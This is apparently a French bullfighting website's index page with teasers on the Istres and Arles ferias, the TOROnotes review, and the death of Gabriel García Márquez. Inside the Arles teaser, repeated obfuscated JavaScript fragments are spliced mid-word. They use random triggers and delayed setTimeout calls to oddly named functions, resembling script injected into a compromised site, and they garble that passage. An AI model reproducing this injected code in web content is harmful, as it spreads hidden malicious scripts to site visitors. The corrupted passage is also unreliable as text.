LE PAIN BENIT D’ISTRES

On attendait beaucoup de la feria d’Istres et elle n’a pas failli malgré la tendance générale à la faiblesse des élevages proposés. Le vendredi, la première des affiches de gala proposait

LA REVUE TOROnotes : N° 9

D’une parution à l’autre, TOROnotes s’est installé dans le paysage comme un objet tauromachique singulier, foulant des terrains jusque-là inoccupés, soucieux d’une approche dégagée de l’urgence et libérée de toute

UN GRAND COUP DE CHAPEAU

Comme chaque année, l’arrivée plus ou moins capricieuse du printemps s’accompagne de cette indescriptible sensation de renaissance dont la nature n’a pas l’exclusivité. L’aficionado aussi se sent  libéré des torpeurs

UN GEANT EST TOMBE

Sa dernière apparition publique date du 8 février dernier dans les arènes de Juriquilla, celles-là même où José Tomás faisait sa réapparition il y a quelques jours. Gabriel García Márquez,

DECEPTIONS, REVELATION ET TRIOMPHE MAJUSCULE

Première grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ande date de la temporada française, la Feria d’Arles présentait

EN PARLANT DE RESPECT

Emouvante histoire de famille que les trophées Vila Arenas, ces prix en hommage au docteur Vila Arenas, chirurgien en chef de l’infirmerie de la Real Maestranza de Sevilla. Après avoir